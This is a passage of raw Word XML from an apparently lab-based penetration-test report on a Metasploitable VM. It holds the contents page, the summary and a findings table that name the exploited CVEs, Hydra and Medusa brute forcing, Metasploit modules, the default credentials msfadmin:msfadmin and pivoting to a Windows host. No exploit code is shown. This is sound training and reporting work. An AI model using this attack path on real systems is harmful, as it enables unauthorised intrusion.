        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
          <w:tab w:val="left" w:pos="4682"/>
        </w:tabs>
        <w:spacing w:before="122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2.3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Connectivity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Verification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8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6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="6" w:after="0" w:line="350" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="5214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3.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Reconnaissance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2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Enumeration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64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8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:eastAsia="Wingdings"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="41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3.1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Network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Discovery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47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8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="6" w:after="0" w:line="350" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="6655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3.2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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Key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Services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Identified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8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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>4.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Exploitation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59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9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
          <w:tab w:val="left" w:pos="6843"/>
        </w:tabs>
        <w:spacing w:before="126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4.1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Port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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>21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4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FTP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Service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(vsftpd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2.3.4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Backdoor)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2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9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="351" w:after="0" w:line="185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1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15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351" w:after="0" w:line="185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2" w:name="2"/>
    <w:bookmarkEnd w:id="2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tabs>
          <w:tab w:val="left" w:pos="1080"/>
          <w:tab w:val="left" w:pos="3962"/>
        </w:tabs>
        <w:spacing w:before="192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Description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3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9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="11" w:after="0" w:line="350" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="5214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Method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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>1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Hydra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FTP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Brute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Force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54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9</w:t>
      </w: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Method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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2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Metasploit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Backdoor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Exploit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33"/>
          <w:noProof/>
        </w:rPr>
        <w:t>9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2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0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Remediation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5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10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="437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4.2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Port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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>22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4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SSH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(Brute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Force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Medusa)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7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10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Description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3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10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
          <w:tab w:val="left" w:pos="3241"/>
        </w:tabs>
        <w:spacing w:before="121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Exploitation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Steps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83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10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
          <w:tab w:val="left" w:pos="3962"/>
        </w:tabs>
        <w:spacing w:before="126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Remediation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11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="3649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4.3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Port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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>23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59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Telnet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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>(Cleartext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+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Default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Credentials)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19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11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Description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3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11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
          <w:tab w:val="left" w:pos="6122"/>
        </w:tabs>
        <w:spacing w:before="121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Method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42"/>
          <w:noProof/>
        </w:rPr>
        <w:t>1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Banner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Capture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Direct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Login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6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11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="6" w:after="0" w:line="350" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="2929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Method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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2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Hydra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Brute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Force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+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Metasploit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Session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Upgrade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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>12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2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0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Remediation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5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12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="3649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4.4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Port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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>80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4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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>HTTP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(PHP-CGI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Argument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Injection)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47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12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Description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3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12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="6530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Exploitation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Metasploit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4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13</w:t>
      </w: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3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Remediation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50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13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="3649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4.5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Port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445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59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SMB/Samba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(usermap_script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RCE)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46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13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Description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3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14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="6530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Exploitation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Metasploit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14</w:t>
      </w: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3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Remediation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50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14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="4370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4.6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Port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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>3306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MySQL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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>(No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Root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Password)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5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14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Description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3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15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
          <w:tab w:val="left" w:pos="3962"/>
        </w:tabs>
        <w:spacing w:before="122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Discovery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Metasploit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7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15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="6" w:after="0" w:line="350" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="509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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Exploitation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4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Direct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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Database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Access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15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15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:eastAsia="Wingdings"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="42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2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0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Remediation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5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16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="3649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5.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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Post-Exploitation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Windows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Payload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3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Pivoting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8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17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:eastAsia="Wingdings"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="40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5.1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Pivoting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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Through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Metasploitable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135"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="3649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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>1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58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Establish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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Meterpreter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Session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Bridge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44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17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:eastAsia="Wingdings"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="39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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2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7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Add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Internal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Route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Pivot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1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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
          <w:tab w:val="left" w:pos="4682"/>
        </w:tabs>
        <w:spacing w:before="121" w:after="0" w:line="229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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>3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58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Scan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Internal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Network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7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18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="11" w:after="0" w:line="350" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="5090"/>
        <w:jc w:val="both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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>4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58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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Generate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Windows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Payload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6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18</w:t>
      </w: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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>5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Deliver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Payload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0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Pivot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64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18</w:t>
      </w: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31"/>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="58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Post-Exploitation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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>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Windows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8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19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720" w:right="3649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38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6.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Consolidated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Remediation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9"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Recommendations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64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20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:eastAsia="Wingdings"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="40"/>
          <w:noProof/>
        </w:rPr>
        <w:t>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6.1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General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Security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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Hardening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27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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
          <w:tab w:val="left" w:pos="3241"/>
        </w:tabs>
        <w:spacing w:before="121" w:after="0" w:line="237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</w:pP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></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:eastAsia="Wingdings"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:spacing w:val="1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8"/>
          <w:noProof/>
        </w:rPr>
        <w:t>7.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0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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Conclusion</w:t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143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24"/>
          <w:noProof/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="121" w:after="0" w:line="237" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Arial Black" w:eastAsia="Arial Black"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#000000"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-47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331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2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3" w:name="3"/>
    <w:bookmarkEnd w:id="3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64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4A5568"/>
          <w:i/>
          <w:spacing w:val="-25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4A5568"/>
          <w:i/>
          <w:spacing w:val="-257"/>
          <w:noProof/>
        </w:rPr>
      </w:pP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This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8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4"/>
          <w:noProof/>
        </w:rPr>
        <w:t>document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11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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>contains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8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sensitive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9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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>security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8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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>information.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6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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Handle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9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accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="324" w:after="0" w:line="255" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="385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This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report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documents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comprehensive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Team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assessment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conducted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against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virtual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machine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hosted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within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an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isolated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dual-network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lab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environment.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engagement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simulated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realistic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corporate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penetration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test,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progressing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from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initial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="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reconnaissance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through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full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system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compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="226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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="0" w:line="255" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="290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Six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critical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services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were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targeted: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FTP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(21),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SSH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(22),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Telnet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(23),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HTTP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(80),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SMB/Samba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(445),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and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MySQL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(3306).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Every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successfully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exploited,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resulting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root-level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full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administrative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access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target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system.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Additionally,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lab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environment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extended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include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pivoting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scenario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an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internal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Windows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10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endpoint,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demonstrating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lateral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movement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capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="378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2" w:space="0" w:color="D0D7E3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03"/>
        <w:gridCol w:w="2499"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="3561"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="677" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="240" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="569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1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22"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port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33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6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>/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7"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:tcW w:w="2499" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="119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98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6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="119" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:lef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27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6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:tcW w:w="3561" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="119" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:lef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25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8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="603" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="87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21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4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FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2499" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="14" w:after="34" w:line="230" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="226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vsftpd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2.3.4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Backdoor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(CVE-2011-2523)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFF0F0" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="100" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:lef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C0392B"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-129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C0392B"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-17"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="3561" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="105" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="120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Root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shell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  <w:t>via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Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="638" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="123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22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4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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:tcW w:w="2499" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="117" w:after="29" w:line="240" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="87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Weak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/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Default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Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="FFF8E7" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="141" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:lef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9B4D00"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-56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9B4D00"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-14"/>
                <w:noProof/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="138" w:after="0" w:line="219" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="120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Full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1"/>
                <w:noProof/>
              </w:rPr>
              <w:t>shell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54"/>
                <w:noProof/>
              </w:rPr>
              <w:t>—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msfadmin:msfadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="638" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="18" w:after="24" w:line="220" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="560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4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>23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28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3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Telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="2499" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="117" w:after="29" w:line="240" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="50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Cleartext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+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Default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Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="double" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="FFF8E7" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="136" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:lef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9B4D00"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-56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9B4D00"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-14"/>
                <w:noProof/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="3561" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="145" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="-60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:color w:val="#333333"/>
                <w:spacing w:val="1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Remote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shell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  <w:t>via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Hydra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brute-force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="643" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="128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3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80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4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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:tcW w:w="2499" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="122" w:after="34" w:line="240" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="150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5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PHP-CGI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Arg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Injection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(CVE-2012-1823)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0F0" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="141" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:lef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C0392B"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-129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C0392B"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-17"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:tcW w:w="3561" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="146" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="120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8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Meterpreter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as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6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www-data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="638" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="123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445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4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SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="2499" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="117" w:after="29" w:line="240" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="89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Samba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usermap_script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(CVE-2007-2447)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="double" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0F0" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="136" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:lef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C0392B"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-129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C0392B"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-17"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="3561" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="145" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="120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Root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shell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  <w:t>via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Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="639" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="18" w:after="24" w:line="220" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="433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3306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1"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:tcW w:w="2499" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="121" w:after="34" w:line="240" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="110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5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>No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  <w:t>root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9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>password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0"/>
                <w:noProof/>
